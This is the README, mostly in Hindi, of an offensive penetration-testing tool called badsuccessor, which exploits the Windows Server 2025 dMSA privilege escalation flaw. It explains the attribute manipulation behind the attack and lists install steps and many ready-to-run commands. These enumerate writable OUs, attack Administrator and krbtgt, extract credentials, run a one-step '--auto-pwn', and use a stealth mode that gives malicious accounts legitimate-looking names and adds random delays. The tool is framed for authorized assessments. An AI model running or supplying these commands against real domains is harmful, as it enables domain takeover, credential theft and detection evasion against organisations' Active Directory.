
Windows Server 2025 dMSA विशेषाधिकार वृद्धि भेद्यता का दोहन करके लिखने योग्य OU की सूची बनाता है, मनमाने डोमेन उपयोगकर्ताओं तक विशेषाधिकार बढ़ाता है, क्रेडेंशियल निकालता है, और अधिकृत AD सुरक्षा मूल्यांकनों में डोमेन टेकओवर सक्षम करता है।
एक पैठ परीक्षण उपकरण जो Windows Server 2025 Active Directory वातावरण में dMSA (प्रत्यायोजित प्रबंधित सेवा खाता) विशेषाधिकार वृद्धि भेद्यता का शोषण करता है।
यह उपकरण केवल अधिकृत पैठ परीक्षण और सुरक्षा अनुसंधान उद्देश्यों के लिए है। स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस उपकरण का उपयोग अवैध और अनैतिक है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
महत्वपूर्ण: यह उपकरण सक्रिय विकास और परीक्षण के अधीन है।
हम सुरक्षा समुदाय को प्रोत्साहित करते हैं:
इस उपकरण का उपयोग करके, आप स्वीकार करते हैं कि यह सक्रिय विकास के अधीन है और आपके विशिष्ट वातावरण के लिए संशोधनों की आवश्यकता हो सकती है।
BadSuccessor Windows Server 2025 की प्रत्यायोजित प्रबंधित सेवा खाता (dMSA) सुविधा में विशेषाधिकार वृद्धि भेद्यता का शोषण करता है। यह भेद्यता न्यूनतम अनुमतियों वाले हमलावरों को डोमेन में किसी भी उपयोगकर्ता, जिसमें डोमेन व्यवस्थापक शामिल हैं, के लिए विशेषाधिकार बढ़ाने की अनुमति देती है।
यह उपकरण Akamai Technologies से Yuval Gordon के उत्कृष्ट अनुसंधान पर आधारित है:
यह भेद्यता dMSA प्रवासन प्रक्रिया में मौजूद है जहाँ:
msDS-ManagedAccountPrecededByLink या ms-DS-Managed-Account-Preceded-By-Link को लक्षित उपयोगकर्ता की ओर इंगित करने के लिए सेट करता हैmsDS-DelegatedMSAState या ms-DS-Delegated-MSA-State को 2 (प्रवासन पूर्ण) पर सेट करता हैइसके अतिरिक्त, KERB-DMSA-KEY-PACKAGE संरचना में लक्षित उपयोगकर्ता के पासवर्ड कुंजियाँ होती हैं, जिससे क्रेडेंशियल निष्कर्षण सक्षम होता है।
pip3 install ldap3 pyasn1 pycryptodome pip3 install impacket==0.12.0
**नोट**: इस टूल का परीक्षण impacket 0.12.0 के साथ किया गया है। संस्करण संगतता चेतावनियाँ रनटाइम पर प्रदर्शित की जाती हैं।
### वैकल्पिक निर्भरताएँ```bash
# For DNS discovery
pip3 install dnspython
# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2
# RHEL/CentOS/Fedora
sudo yum install krb5-devel
CreateChild अनुमतिWrite अनुमतिGenericWrite अनुमतिGenericAll अनुमतिgit clone https://github.com/cybrly/badsuccessor.git cd badsuccessor pip3 install -r requirements.txt chmod +x badsuccessor.py
### requirements.txt```
ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0
python3 badsuccessor.py -d -u -p [options]
### त्वरित प्रारंभ उदाहरण
#### 1. ड्राई रन मोड (नया) - बिना परिवर्तन किए परीक्षण करें```bash
# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator
# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"
python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets
python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator
#### 3. आक्रमण करें```bash
# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30
# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
--dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
--dmsa-display-name "Production Service"
# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
--dmsa-pattern "svc{random}prod"
python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql
python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn
#### 5. सत्र प्रबंधन (नया)```bash
# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions
# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234
# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID
# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html